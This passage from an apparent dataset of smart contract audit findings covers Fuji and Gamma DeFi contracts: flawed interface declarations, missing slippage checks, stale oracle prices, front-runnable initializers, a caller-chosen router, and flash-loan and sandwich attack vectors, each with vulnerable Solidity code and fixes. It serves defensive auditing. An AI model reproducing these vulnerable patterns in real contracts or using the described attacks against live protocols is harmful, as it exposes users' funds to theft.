However, we urge the client to only use official interface declarations from the upstream projects and verify that all other interfaces match.\\nThe `ILendingPool` configured in `ProviderAave` (0xB53C1a33016B2DC2fF3653530bfF1848a515c8c5 -> implementation: 0xc6845a5c768bf8d7681249f8927877efda425baf)\\n```\\nfunction \\_getAaveProvider() internal pure returns (IAaveLendingPoolProvider) {\\n return IAaveLendingPoolProvider(0xB53C1a33016B2DC2fF3653530bfF1848a515c8c5);\\n}\\n```\\n\\nThe `IAaveLendingPool` does not declare return values for any function, while upstream does.\\n```\\n// SPDX-License-Identifier: MIT\\n\\npragma solidity ^0.8.0;\\n\\ninterface IAaveLendingPool {\\n function flashLoan(\\n address receiverAddress,\\n address[] calldata assets,\\n uint256[] calldata amounts,\\n uint256[] calldata modes,\\n address onBehalfOf,\\n bytes calldata params,\\n uint16 referralCode\\n ) external;\\n\\n function deposit(\\n address \\_asset,\\n uint256 \\_amount,\\n address \\_onBehalfOf,\\n uint16 \\_referralCode\\n ) external;\\n\\n function withdraw(\\n address \\_asset,\\n uint256 \\_amount,\\n address \\_to\\n ) external;\\n\\n function borrow(\\n address \\_asset,\\n uint256 \\_amount,\\n uint256 \\_interestRateMode,\\n uint16 \\_referralCode,\\n address \\_onBehalfOf\\n ) external;\\n\\n function repay(\\n address \\_asset,\\n uint256 \\_amount,\\n uint256 \\_rateMode,\\n address \\_onBehalfOf\\n ) external;\\n\\n function setUserUseReserveAsCollateral(address \\_asset, bool \\_useAsCollateral) external;\\n}\\n```\\n\\nMethods: `withdraw()`, `repay()` return `uint256` in the original implementation for Aave, see:\\nhttps://etherscan.io/address/0xc6845a5c768bf8d7681249f8927877efda425baf#code\\nThe `ILendingPool` configured for Geist:\\nMethods `withdraw()`, `repay()` return `uint256` in the original implementation for Geist, see:\\nhttps://ftmscan.com/address/0x3104ad2aadb6fe9df166948a5e3a547004862f90#code\\nNote: that the actual `amount` withdrawn does not 
necessarily need to match the `amount` provided with the function argument. Here's an excerpt of the upstream LendingProvider.withdraw():\\n```\\n// rest of code\\n if (amount == type(uint256).max) {\\n amountToWithdraw = userBalance;\\n }\\n// rest of code\\n return amountToWithdraw;\\n```\\n\\nAnd here's the code in Fuji that calls that method. This will break the `withdrawAll` functionality of `LendingProvider` if token `isFTM`.\\n```\\nfunction withdraw(address \\_asset, uint256 \\_amount) external payable override {\\n IAaveLendingPool aave = IAaveLendingPool(\\_getAaveProvider().getLendingPool());\\n\\n bool isFtm = \\_asset == \\_getFtmAddr();\\n address \\_tokenAddr = isFtm ? \\_getWftmAddr() : \\_asset;\\n\\n aave.withdraw(\\_tokenAddr, \\_amount, address(this));\\n\\n // convert WFTM to FTM\\n if (isFtm) {\\n address unwrapper = \\_getUnwrapper();\\n IERC20(\\_tokenAddr).univTransfer(payable(unwrapper), \\_amount);\\n IUnwrapper(unwrapper).withdraw(\\_amount);\\n }\\n}\\n```\\n\\nSimilar for `repay()`, which returns the actual amount repaid.",Always use the original interface unless only a minimal subset of functions is used.\\nUse the original upstream interfaces of the corresponding project (link via the respective npm packages if available).\\nAvoid omitting parts of the function declaration! Especially when it comes to return values.\\nCheck return values. Use the value returned from `withdraw()` AND `repay()`,,```\\nfunction \\_getAaveProvider() internal pure returns (IAaveLendingPoolProvider) {\\n return IAaveLendingPoolProvider(0xB53C1a33016B2DC2fF3653530bfF1848a515c8c5);\\n}\\n```\\n +Missing slippage protection for rewards swap,medium,"In `FujiVaultFTM.harvestRewards` a swap transaction is generated using a call to `SwapperFTM.getSwapTransaction`. In all relevant scenarios, this call uses a minimum output amount of zero, which de-facto deactivates slippage checks. 
Most values from harvesting rewards can thus be siphoned off by sandwiching such calls.\\n`amountOutMin` is `0`, effectively disabling slippage control in the swap method.\\n```\\ntransaction.data = abi.encodeWithSelector(\\n IUniswapV2Router01.swapExactETHForTokens.selector,\\n 0,\\n path,\\n msg.sender,\\n type(uint256).max\\n);\\n```\\n\\nOnly success required\\n```\\n// Swap rewards -> collateralAsset\\n(success, ) = swapTransaction.to.call{ value: swapTransaction.value }(swapTransaction.data);\\nrequire(success, ""failed to swap rewards"");\\n```\\n","Use a slippage check such as for liquidator swaps:\\n```\\nrequire(\\n (priceDelta \\* SLIPPAGE\\_LIMIT\\_DENOMINATOR) / priceFromOracle < SLIPPAGE\\_LIMIT\\_NUMERATOR,\\n Errors.VL\\_SWAP\\_SLIPPAGE\\_LIMIT\\_EXCEED\\n);\\n```\\n\\nOr specify a non-zero `amountOutMin` argument in calls to `IUniswapV2Router01.swapExactETHForTokens`.",,"```\\ntransaction.data = abi.encodeWithSelector(\\n IUniswapV2Router01.swapExactETHForTokens.selector,\\n 0,\\n path,\\n msg.sender,\\n type(uint256).max\\n);\\n```\\n" +FujiOracle - _getUSDPrice does not detect stale oracle prices; General Oracle Risks,medium,"The external Chainlink oracle, which provides index price information to the system, introduces risk inherent to any dependency on third-party data sources. For example, the oracle could fall behind or otherwise fail to be maintained, resulting in outdated data being fed to the index price calculations. 
Oracle reliance has historically resulted in crippled on-chain systems, and complications that lead to these outcomes can arise from things as simple as network congestion.\\nThis is more extreme in lesser-known tokens with fewer ChainLink Price feeds to update the price frequently.\\nEnsuring that unexpected oracle return values are correctly handled will reduce reliance on off-chain components and increase the resiliency of the smart contract system that depends on them.\\nThe codebase, as is, relies on `chainLinkOracle.latestRoundData()` and does not check the `timestamp` or `answeredIn` round of the returned price.\\nHere's how the oracle is consumed, skipping any fields that would allow checking for stale data:\\n```\\n/\\*\\*\\n \\* @dev Calculates the USD price of asset.\\n \\* @param \\_asset: the asset address.\\n \\* Returns the USD price of the given asset\\n \\*/\\nfunction \\_getUSDPrice(address \\_asset) internal view returns (uint256 price) {\\n require(usdPriceFeeds[\\_asset] != address(0), Errors.ORACLE\\_NONE\\_PRICE\\_FEED);\\n\\n (, int256 latestPrice, , , ) = AggregatorV3Interface(usdPriceFeeds[\\_asset]).latestRoundData();\\n\\n price = uint256(latestPrice);\\n}\\n```\\n\\nHere's the implementation of the v0.6 FluxAggregator Chainlink feed with a note that timestamps should be checked.\\n```\\n\\* @return updatedAt is the timestamp when the round last was updated (i.e.\\n\\* answer was last computed)\\n```\\n","Perform sanity checks on the price returned by the oracle. If the price is older, not within configured limits, revert or handle in other means.\\nThe oracle does not provide any means to remove a potentially broken price-feed (e.g., by updating its address to `address(0)` or by pausing specific feeds or the complete oracle). The only way to pause an oracle right now is to deploy a new oracle contract. 
Therefore, consider adding minimally invasive functionality to pause the price-feeds if the oracle becomes unreliable.\\nMonitor the oracle data off-chain and intervene if it becomes unreliable.\\nOn-chain, realistically, both `answeredInRound` and `updatedAt` must be checked within acceptable bounds.\\n`answeredInRound == latestRound` - in this case, data may be assumed to be fresh while it might not be because the feed was entirely abandoned by nodes (no one starting a new round). Also, there's a good chance that many feeds won't always be super up-to-date (it might be acceptable to allow a threshold). A strict check might lead to transactions failing (race; e.g., round just timed out).\\n`roundId + threshold >= answeredInRound` - would allow a deviation of threshold rounds. This check alone might still result in stale data to be used if there are no more rounds. Therefore, this should be combined with `updatedAt + threshold >= block.timestamp`.",,"```\\n/\\*\\*\\n \\* @dev Calculates the USD price of asset.\\n \\* @param \\_asset: the asset address.\\n \\* Returns the USD price of the given asset\\n \\*/\\nfunction \\_getUSDPrice(address \\_asset) internal view returns (uint256 price) {\\n require(usdPriceFeeds[\\_asset] != address(0), Errors.ORACLE\\_NONE\\_PRICE\\_FEED);\\n\\n (, int256 latestPrice, , , ) = AggregatorV3Interface(usdPriceFeeds[\\_asset]).latestRoundData();\\n\\n price = uint256(latestPrice);\\n}\\n```\\n" +Unclaimed or front-runnable proxy implementations,medium,"Various smart contracts in the system require initialization functions to be called. The point when these calls happen is up to the deploying address. 
Deployment and initialization in one transaction are typically safe, but it can potentially be front-run if the initialization is done in a separate transaction.\\nA frontrunner can call these functions to silently take over the contracts and provide malicious parameters or plant a backdoor during the deployment.\\nLeaving proxy implementations uninitialized further aides potential phishing attacks where users might claim that - just because a contract address is listed in the official documentation/code-repo - a contract is a legitimate component of the system. At the same time, it is ‘only' a proxy implementation that an attacker claimed. For the end-user, it might be hard to distinguish whether this contract is part of the system or was a maliciously appropriated implementation.\\n```\\nfunction initialize(\\n address \\_fujiadmin,\\n address \\_oracle,\\n address \\_collateralAsset,\\n address \\_borrowAsset\\n) external initializer {\\n```\\n\\n`FujiVault` was initialized many days after deployment, and `FujiVault` inherits `VaultBaseUpgradeable`, which exposes a `delegatecall` that can be used to `selfdestruct` the contract's implementation.\\nAnother `FujiVault` was deployed by `deployer` initialized in a 2-step approach that can theoretically silently be front-run.\\ncode/artifacts/250-core.deploy:L2079-L2079\\n```\\n""deployer"": ""0xb98d4D4e205afF4d4755E9Df19BD0B8BD4e0f148"",\\n```\\n\\nTransactions of deployer:\\nhttps://ftmscan.com/txs?a=0xb98d4D4e205afF4d4755E9Df19BD0B8BD4e0f148&p=2\\nThe specific contract was initialized 19 blocks after deployment.\\nhttps://ftmscan.com/address/0x8513c2db99df213887f63300b23c6dd31f1d14b0\\n\\n`FujiAdminFTM` (and others) don't seem to be initialized. (low prior; no risk other than pot. 
reputational damage)\\ncode/artifacts/250-core.deploy:L1-L7\\n```\\n{\\n ""FujiAdmin"": {\\n ""address"": ""0xaAb2AAfBFf7419Ff85181d3A846bA9045803dd67"",\\n ""deployer"": ""0xb98d4D4e205afF4d4755E9Df19BD0B8BD4e0f148"",\\n ""abi"": [\\n {\\n ""anonymous"": false,\\n```\\n","It is recommended to use constructors wherever possible to immediately initialize proxy implementations during deploy-time. The code is only run when the implementation is deployed and affects the proxy initializations. If other initialization functions are used, we recommend enforcing deployer access restrictions or a standardized, top-level `initialized` boolean, set to `true` on the first deployment and used to prevent future initialization.\\nUsing constructors and locked-down initialization functions will significantly reduce potential developer errors and the possibility of attackers re-initializing vital system components.",,"```\\nfunction initialize(\\n address \\_fujiadmin,\\n address \\_oracle,\\n address \\_collateralAsset,\\n address \\_borrowAsset\\n) external initializer {\\n```\\n" +WFTM - Use of incorrect interface declarations,low,"The `WFTMUnwrapper` and various providers utilize the `IWETH` interface declaration for handling funds denoted in `WFTM`. However, the `WETH` and `WFTM` implementations are different. 
`WFTM` returns `uint256` values to indicate error conditions while the `WETH` contract does not.\\n```\\ncontract WFTMUnwrapper {\\n address constant wftm = 0x21be370D5312f44cB42ce377BC9b8a0cEF1A4C83;\\n\\n receive() external payable {}\\n\\n /\\*\\*\\n \\* @notice Convert WFTM to FTM and transfer to msg.sender\\n \\* @dev msg.sender needs to send WFTM before calling this withdraw\\n \\* @param \\_amount amount to withdraw.\\n \\*/\\n function withdraw(uint256 \\_amount) external {\\n IWETH(wftm).withdraw(\\_amount);\\n (bool sent, ) = msg.sender.call{ value: \\_amount }("""");\\n require(sent, ""Failed to send FTM"");\\n }\\n}\\n```\\n\\nThe `WFTM` contract on Fantom returns an error return value. The error return value cannot be checked when utilizing the `IWETH` interface for `WFTM`. The error return values are never checked throughout the system for `WFTM` operations. This might be intentional to allow `amount=0` on `WETH` to act as a NOOP similar to `WETH`.\\n```\\n// convert FTM to WFTM\\nif (isFtm) IWETH(\\_tokenAddr).deposit{ value: \\_amount }();\\n```\\n\\nAlso see issues: issue 4.4, issue 4.5, issue 4.10","We recommend using the correct interfaces for all contracts instead of partial stubs. Do not modify the original function declarations, e.g., by omitting return value declarations. 
The codebase should also check return values where possible or explicitly state why values can safely be ignored in inline comments or the function's natspec documentation block.",,"```\\ncontract WFTMUnwrapper {\\n address constant wftm = 0x21be370D5312f44cB42ce377BC9b8a0cEF1A4C83;\\n\\n receive() external payable {}\\n\\n /\\*\\*\\n \\* @notice Convert WFTM to FTM and transfer to msg.sender\\n \\* @dev msg.sender needs to send WFTM before calling this withdraw\\n \\* @param \\_amount amount to withdraw.\\n \\*/\\n function withdraw(uint256 \\_amount) external {\\n IWETH(wftm).withdraw(\\_amount);\\n (bool sent, ) = msg.sender.call{ value: \\_amount }("""");\\n require(sent, ""Failed to send FTM"");\\n }\\n}\\n```\\n" +"Inconsistent isFTM, isETH checks",low,"`LibUniversalERC20FTM.isFTM()` and `LibUniversalERC20.isETH()` identifies native assets by matching against two distinct addresses while some components only check for one.\\nThe same is true for `FTM`.\\n`Flasher` only identifies a native `asset` transfer by matching `asset` against `_ETH = 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE` while `univTransfer()` identifies it using `0x0 || 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE`\\n```\\nfunction callFunction(\\n address sender,\\n Account.Info calldata account,\\n bytes calldata data\\n) external override {\\n require(msg.sender == \\_dydxSoloMargin && sender == address(this), Errors.VL\\_NOT\\_AUTHORIZED);\\n account;\\n\\n FlashLoan.Info memory info = abi.decode(data, (FlashLoan.Info));\\n\\n uint256 \\_value;\\n if (info.asset == \\_ETH) {\\n // Convert WETH to ETH and assign amount to be set as msg.value\\n \\_convertWethToEth(info.amount);\\n \\_value = info.amount;\\n } else {\\n // Transfer to Vault the flashloan Amount\\n // \\_value is 0\\n IERC20(info.asset).univTransfer(payable(info.vault), info.amount);\\n }\\n```\\n\\n`LibUniversalERC20`\\n```\\nlibrary LibUniversalERC20 {\\n using SafeERC20 for IERC20;\\n\\n IERC20 private constant 
\\_ETH\\_ADDRESS = IERC20(0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE);\\n IERC20 private constant \\_ZERO\\_ADDRESS = IERC20(0x0000000000000000000000000000000000000000);\\n\\n function isETH(IERC20 token) internal pure returns (bool) {\\n return (token == \\_ZERO\\_ADDRESS || token == \\_ETH\\_ADDRESS);\\n }\\n```\\n\\n```\\nfunction univTransfer(\\n IERC20 token,\\n address payable to,\\n uint256 amount\\n) internal {\\n if (amount > 0) {\\n if (isETH(token)) {\\n (bool sent, ) = to.call{ value: amount }("""");\\n require(sent, ""Failed to send Ether"");\\n } else {\\n token.safeTransfer(to, amount);\\n }\\n }\\n}\\n```\\n\\nThere are multiple other instances of this\\n```\\nuint256 \\_value = vAssets.borrowAsset == ETH ? debtTotal : 0;\\n```\\n","Consider using a consistent way to identify native asset transfers (i.e. `ETH`, FTM) by using `LibUniversalERC20.isETH()`. Alternatively, the system can be greatly simplified by expecting WFTM and only working with it. This simplification will remove all special cases where the library must handle non-ERC20 interfaces.",,"```\\nfunction callFunction(\\n address sender,\\n Account.Info calldata account,\\n bytes calldata data\\n) external override {\\n require(msg.sender == \\_dydxSoloMargin && sender == address(this), Errors.VL\\_NOT\\_AUTHORIZED);\\n account;\\n\\n FlashLoan.Info memory info = abi.decode(data, (FlashLoan.Info));\\n\\n uint256 \\_value;\\n if (info.asset == \\_ETH) {\\n // Convert WETH to ETH and assign amount to be set as msg.value\\n \\_convertWethToEth(info.amount);\\n \\_value = info.amount;\\n } else {\\n // Transfer to Vault the flashloan Amount\\n // \\_value is 0\\n IERC20(info.asset).univTransfer(payable(info.vault), info.amount);\\n }\\n```\\n" +FujiOracle - setPriceFeed should check asset and priceFeed decimals,low,"`getPriceOf()` assumes that all price feeds return prices with identical decimals, but `setPriceFeed` does not enforce this. 
Potential misconfigurations can have severe effects on the system's internal accounting.\\n```\\n/\\*\\*\\n \\* @dev Sets '\\_priceFeed' address for a '\\_asset'.\\n \\* Can only be called by the contract owner.\\n \\* Emits a {AssetPriceFeedChanged} event.\\n \\*/\\nfunction setPriceFeed(address \\_asset, address \\_priceFeed) public onlyOwner {\\n require(\\_priceFeed != address(0), Errors.VL\\_ZERO\\_ADDR);\\n usdPriceFeeds[\\_asset] = \\_priceFeed;\\n emit AssetPriceFeedChanged(\\_asset, \\_priceFeed);\\n}\\n```\\n",We recommend adding additional checks to detect unexpected changes in assets' properties. Safeguard price feeds by enforcing `priceFeed` == address(0) || priceFeed.decimals() == `8`. This allows the owner to disable a `priceFeed` (setting it to zero) and otherwise ensure that the feed is compatible and indeed returns `8` decimals.,,"```\\n/\\*\\*\\n \\* @dev Sets '\\_priceFeed' address for a '\\_asset'.\\n \\* Can only be called by the contract owner.\\n \\* Emits a {AssetPriceFeedChanged} event.\\n \\*/\\nfunction setPriceFeed(address \\_asset, address \\_priceFeed) public onlyOwner {\\n require(\\_priceFeed != address(0), Errors.VL\\_ZERO\\_ADDR);\\n usdPriceFeeds[\\_asset] = \\_priceFeed;\\n emit AssetPriceFeedChanged(\\_asset, \\_priceFeed);\\n}\\n```\\n" +UniProxy.depositSwap - Tokens are not approved before calling Router.exactInput,high,"the call to Router.exactInputrequires the sender to pre-approve the tokens. 
We could not find any reference for that, thus we assume that a call to `UniProxy.depositSwap` will always revert.\\n```\\nrouter = ISwapRouter(\\_router);\\nuint256 amountOut;\\nuint256 swap;\\nif(swapAmount < 0) {\\n //swap token1 for token0\\n\\n swap = uint256(swapAmount \\* -1);\\n IHypervisor(pos).token1().transferFrom(msg.sender, address(this), deposit1+swap);\\n amountOut = router.exactInput(\\n ISwapRouter.ExactInputParams(\\n path,\\n address(this),\\n block.timestamp + swapLife,\\n swap,\\n deposit0\\n )\\n );\\n}\\nelse{\\n //swap token1 for token0\\n swap = uint256(swapAmount);\\n IHypervisor(pos).token0().transferFrom(msg.sender, address(this), deposit0+swap);\\n\\n amountOut = router.exactInput(\\n ISwapRouter.ExactInputParams(\\n path,\\n address(this),\\n block.timestamp + swapLife,\\n swap,\\n deposit1\\n )\\n ); \\n}\\n```\\n",Resolution\\nFixed in GammaStrategies/[email protected]9a7a3dd by deleting the `depositSwap` function.\\nConsider approving the exact amount of input tokens before the swap.,,"```\\nrouter = ISwapRouter(\\_router);\\nuint256 amountOut;\\nuint256 swap;\\nif(swapAmount < 0) {\\n //swap token1 for token0\\n\\n swap = uint256(swapAmount \\* -1);\\n IHypervisor(pos).token1().transferFrom(msg.sender, address(this), deposit1+swap);\\n amountOut = router.exactInput(\\n ISwapRouter.ExactInputParams(\\n path,\\n address(this),\\n block.timestamp + swapLife,\\n swap,\\n deposit0\\n )\\n );\\n}\\nelse{\\n //swap token1 for token0\\n swap = uint256(swapAmount);\\n IHypervisor(pos).token0().transferFrom(msg.sender, address(this), deposit0+swap);\\n\\n amountOut = router.exactInput(\\n ISwapRouter.ExactInputParams(\\n path,\\n address(this),\\n block.timestamp + swapLife,\\n swap,\\n deposit1\\n )\\n ); \\n}\\n```\\n" +Uniproxy.depositSwap - _router should not be determined by the caller,high,"`Uniproxy.depositSwap` uses `_router` that is determined by the caller, which in turn might inject a “fake” contract, and thus may steal funds 
stuck in the `UniProxy` contract.\\nThe `UniProxy` contract has certain trust assumptions regarding the router. The router is supposed to return not less than deposit1(or deposit0) amount of tokens but that fact is never checked.\\n```\\nfunction depositSwap(\\n int256 swapAmount, // (-) token1, (+) token0 for token1; amount to swap\\n uint256 deposit0,\\n uint256 deposit1,\\n address to,\\n address from,\\n bytes memory path,\\n address pos,\\n address \\_router\\n) external returns (uint256 shares) {\\n```\\n","Consider removing the `_router` parameter from the function, and instead, use a storage variable that will be initialized in the constructor.",,"```\\nfunction depositSwap(\\n int256 swapAmount, // (-) token1, (+) token0 for token1; amount to swap\\n uint256 deposit0,\\n uint256 deposit1,\\n address to,\\n address from,\\n bytes memory path,\\n address pos,\\n address \\_router\\n) external returns (uint256 shares) {\\n```\\n" +Re-entrancy + flash loan attack can invalidate price check,high,"The `UniProxy` contract has a price manipulation protection:\\n```\\nif (twapCheck || positions[pos].twapOverride) {\\n // check twap\\n checkPriceChange(\\n pos,\\n (positions[pos].twapOverride ? positions[pos].twapInterval : twapInterval),\\n (positions[pos].twapOverride ? positions[pos].priceThreshold : priceThreshold)\\n );\\n}\\n```\\n\\nBut after that, the tokens are transferred from the user, if the token transfer allows an attacker to hijack the call-flow of the transaction inside, the attacker can manipulate the Uniswap price there, after the check happened. The Hypervisor's `deposit` function itself is vulnerable to the flash-loan attack.","Make sure the price does not change before the `Hypervisor.deposit` call. For example, the token transfers can be made at the beginning of the `UniProxy.deposit` function.",,"```\\nif (twapCheck || positions[pos].twapOverride) {\\n // check twap\\n checkPriceChange(\\n pos,\\n (positions[pos].twapOverride ? 
positions[pos].twapInterval : twapInterval),\\n (positions[pos].twapOverride ? positions[pos].priceThreshold : priceThreshold)\\n );\\n}\\n```\\n" +UniProxy.properDepositRatio - Proper ratio will not prevent liquidity imbalance for all possible scenarios,high,"`UniProxy.properDepositRatio` purpose is to be used as a mechanism to prevent liquidity imbalance. The idea is to compare the deposit ratio with the `hypeRatio`, which is the ratio between the tokens held by the `Hypervisor` contract. In practice, however, this function will not prevent a skewed deposit ratio in many cases. `deposit1 / deposit0` might be a huge number, while `10^16 <= depositRatio <= 10^18`, and 10^16 <= `hypeRatio` <= 10^18. Let us consider the case where `hype1 / hype0 >= 10`, that means `hypeRatio = 10^18`, and now if `deposit1 / deposit0` = 10^200 for example, `depositRatio = 10^18`, and the transaction will pass, which is clearly not intended.\\n```\\nfunction properDepositRatio(\\n address pos,\\n uint256 deposit0,\\n uint256 deposit1\\n) public view returns (bool) {\\n (uint256 hype0, uint256 hype1) = IHypervisor(pos).getTotalAmounts();\\n if (IHypervisor(pos).totalSupply() != 0) {\\n uint256 depositRatio = deposit0 == 0 ? 10e18 : deposit1.mul(1e18).div(deposit0);\\n depositRatio = depositRatio > 10e18 ? 10e18 : depositRatio;\\n depositRatio = depositRatio < 10e16 ? 10e16 : depositRatio;\\n uint256 hypeRatio = hype0 == 0 ? 10e18 : hype1.mul(1e18).div(hype0);\\n hypeRatio = hypeRatio > 10e18 ? 10e18 : hypeRatio;\\n hypeRatio = hypeRatio < 10e16 ? 
10e16 : hypeRatio;\\n return (FullMath.mulDiv(depositRatio, deltaScale, hypeRatio) < depositDelta &&\\n FullMath.mulDiv(hypeRatio, deltaScale, depositRatio) < depositDelta);\\n }\\n return true;\\n}\\n```\\n","Resolution\\nFixed in GammaStrategies/[email protected]9a7a3dd by deleting the `properDepositRatio` function.\\nConsider removing the cap of [0.1,10] both for `depositRatio` and for `hypeRatio`.",,"```\\nfunction properDepositRatio(\\n address pos,\\n uint256 deposit0,\\n uint256 deposit1\\n) public view returns (bool) {\\n (uint256 hype0, uint256 hype1) = IHypervisor(pos).getTotalAmounts();\\n if (IHypervisor(pos).totalSupply() != 0) {\\n uint256 depositRatio = deposit0 == 0 ? 10e18 : deposit1.mul(1e18).div(deposit0);\\n depositRatio = depositRatio > 10e18 ? 10e18 : depositRatio;\\n depositRatio = depositRatio < 10e16 ? 10e16 : depositRatio;\\n uint256 hypeRatio = hype0 == 0 ? 10e18 : hype1.mul(1e18).div(hype0);\\n hypeRatio = hypeRatio > 10e18 ? 10e18 : hypeRatio;\\n hypeRatio = hypeRatio < 10e16 ? 10e16 : hypeRatio;\\n return (FullMath.mulDiv(depositRatio, deltaScale, hypeRatio) < depositDelta &&\\n FullMath.mulDiv(hypeRatio, deltaScale, depositRatio) < depositDelta);\\n }\\n return true;\\n}\\n```\\n" +UniProxy.depositSwap doesn't deposit all the users' funds,medium,"When executing the swap, the minimal amount out is passed to the router (deposit1 in this example), but the actual swap amount will be `amountOut`. But after the trade, instead of depositing `amountOut`, the contract tries to deposit `deposit1`, which is lower. 
This may result in some users' funds staying in the `UniProxy` contract.\\n```\\nelse{\\n //swap token1 for token0\\n swap = uint256(swapAmount);\\n IHypervisor(pos).token0().transferFrom(msg.sender, address(this), deposit0+swap);\\n\\n amountOut = router.exactInput(\\n ISwapRouter.ExactInputParams(\\n path,\\n address(this),\\n block.timestamp + swapLife,\\n swap,\\n deposit1\\n )\\n ); \\n}\\n\\nrequire(amountOut > 0, ""Swap failed"");\\n\\nif (positions[pos].version < 2) {\\n // requires lp token transfer from proxy to msg.sender\\n shares = IHypervisor(pos).deposit(deposit0, deposit1, address(this));\\n IHypervisor(pos).transfer(to, shares);\\n}\\n```\\n",Resolution\\nFixed in GammaStrategies/[email protected]9a7a3dd by deleting the `depositSwap` function.\\nDeposit all the user's funds to the Hypervisor.,,"```\\nelse{\\n //swap token1 for token0\\n swap = uint256(swapAmount);\\n IHypervisor(pos).token0().transferFrom(msg.sender, address(this), deposit0+swap);\\n\\n amountOut = router.exactInput(\\n ISwapRouter.ExactInputParams(\\n path,\\n address(this),\\n block.timestamp + swapLife,\\n swap,\\n deposit1\\n )\\n ); \\n}\\n\\nrequire(amountOut > 0, ""Swap failed"");\\n\\nif (positions[pos].version < 2) {\\n // requires lp token transfer from proxy to msg.sender\\n shares = IHypervisor(pos).deposit(deposit0, deposit1, address(this));\\n IHypervisor(pos).transfer(to, shares);\\n}\\n```\\n" +Hypervisor - Multiple “sandwiching” front running vectors,medium,"The amount of tokens received from `UniswapV3Pool` functions might be manipulated by front-runners due to the decentralized nature of AMMs, where the order of transactions can not be pre-determined. 
A potential “sandwicher” may insert a buying order before the user's call to `Hypervisor.rebalance` for instance, and a sell order after.\\nMore specifically, calls to `pool.swap`, `pool.mint`, `pool.burn` are susceptible to “sandwiching” vectors.\\n`Hypervisor.rebalance`\\n```\\nif (swapQuantity != 0) {\\n pool.swap(\\n address(this),\\n swapQuantity > 0,\\n swapQuantity > 0 ? swapQuantity : -swapQuantity,\\n swapQuantity > 0 ? TickMath.MIN\\_SQRT\\_RATIO + 1 : TickMath.MAX\\_SQRT\\_RATIO - 1,\\n abi.encode(address(this))\\n );\\n}\\n```\\n\\n```\\nfunction \\_mintLiquidity(\\n int24 tickLower,\\n int24 tickUpper,\\n uint128 liquidity,\\n address payer\\n) internal returns (uint256 amount0, uint256 amount1) {\\n if (liquidity > 0) {\\n (amount0, amount1) = pool.mint(\\n address(this),\\n tickLower,\\n tickUpper,\\n liquidity,\\n abi.encode(payer)\\n );\\n }\\n}\\n```\\n\\n```\\nfunction \\_burnLiquidity(\\n int24 tickLower,\\n int24 tickUpper,\\n uint128 liquidity,\\n address to,\\n bool collectAll\\n) internal returns (uint256 amount0, uint256 amount1) {\\n if (liquidity > 0) {\\n // Burn liquidity\\n (uint256 owed0, uint256 owed1) = pool.burn(tickLower, tickUpper, liquidity);\\n\\n // Collect amount owed\\n uint128 collect0 = collectAll ? type(uint128).max : \\_uint128Safe(owed0);\\n uint128 collect1 = collectAll ? type(uint128).max : \\_uint128Safe(owed1);\\n if (collect0 > 0 || collect1 > 0) {\\n (amount0, amount1) = pool.collect(to, tickLower, tickUpper, collect0, collect1);\\n }\\n }\\n}\\n```\\n",Consider adding an `amountMin` parameter(s) to ensure that at least the `amountMin` of tokens was received.,,"```\\nif (swapQuantity != 0) {\\n pool.swap(\\n address(this),\\n swapQuantity > 0,\\n swapQuantity > 0 ? swapQuantity : -swapQuantity,\\n swapQuantity > 0 ? 
TickMath.MIN\\_SQRT\\_RATIO + 1 : TickMath.MAX\\_SQRT\\_RATIO - 1,\\n abi.encode(address(this))\\n );\\n}\\n```\\n" +Uniswap v3 callbacks access control should be hardened,low,"Resolution\\nFixed in GammaStrategies/[email protected]9a7a3dd by implementing the auditor's recommendation for `uniswapV3MintCallback`, and deleting `uniswapV3SwapCallback` and the call to `pool.swap`.\\nUniswap v3 uses a callback pattern to pull funds from the caller. The caller, (in this case Hypervisor) has to implement a callback function which will be called by the Uniswap's `pool`. Both `uniswapV3MintCallback` and `uniswapV3SwapCallback` restrict the access to the callback functions only for the `pool`. However, this alone will not block a random call from the `pool` contract in case the latter was hacked, which will result in stealing all the funds held in `Hypervisor` or of any user that approved the `Hypervisor` contract to transfer tokens on his behalf.\\n```\\nfunction uniswapV3MintCallback(\\n uint256 amount0,\\n uint256 amount1,\\n bytes calldata data\\n) external override {\\n require(msg.sender == address(pool));\\n address payer = abi.decode(data, (address));\\n\\n if (payer == address(this)) {\\n if (amount0 > 0) token0.safeTransfer(msg.sender, amount0);\\n if (amount1 > 0) token1.safeTransfer(msg.sender, amount1);\\n } else {\\n if (amount0 > 0) token0.safeTransferFrom(payer, msg.sender, amount0);\\n if (amount1 > 0) token1.safeTransferFrom(payer, msg.sender, amount1);\\n }\\n}\\n\\nfunction uniswapV3SwapCallback(\\n int256 amount0Delta,\\n int256 amount1Delta,\\n bytes calldata data\\n) external override {\\n require(msg.sender == address(pool));\\n address payer = abi.decode(data, (address));\\n\\n if (amount0Delta > 0) {\\n if (payer == address(this)) {\\n token0.safeTransfer(msg.sender, uint256(amount0Delta));\\n } else {\\n token0.safeTransferFrom(payer, msg.sender, uint256(amount0Delta));\\n }\\n } else if (amount1Delta > 0) {\\n if (payer == address(this)) {\\n 
token1.safeTransfer(msg.sender, uint256(amount1Delta));\\n } else {\\n token1.safeTransferFrom(payer, msg.sender, uint256(amount1Delta));\\n }\\n }\\n}\\n```\\n","Consider adding (boolean) storage variables that will help to track whether a call to `uniswapV3MintCallback | uniswapV3SwapCallback` was preceded by a call to `_mintLiquidity | rebalance` respectively. An example for the `rebalance` function would be bool `rebalanceCalled`, this variable will be assigned a `true` value in `rebalance` before the external call of `pool.swap`, then `uniswapV3SwapCallback` will require that `rebalanceCalled` == `true`, and then right after `rebalanceCalled` will be assigned a `false` value.",,"```\\nfunction uniswapV3MintCallback(\\n uint256 amount0,\\n uint256 amount1,\\n bytes calldata data\\n) external override {\\n require(msg.sender == address(pool));\\n address payer = abi.decode(data, (address));\\n\\n if (payer == address(this)) {\\n if (amount0 > 0) token0.safeTransfer(msg.sender, amount0);\\n if (amount1 > 0) token1.safeTransfer(msg.sender, amount1);\\n } else {\\n if (amount0 > 0) token0.safeTransferFrom(payer, msg.sender, amount0);\\n if (amount1 > 0) token1.safeTransferFrom(payer, msg.sender, amount1);\\n }\\n}\\n\\nfunction uniswapV3SwapCallback(\\n int256 amount0Delta,\\n int256 amount1Delta,\\n bytes calldata data\\n) external override {\\n require(msg.sender == address(pool));\\n address payer = abi.decode(data, (address));\\n\\n if (amount0Delta > 0) {\\n if (payer == address(this)) {\\n 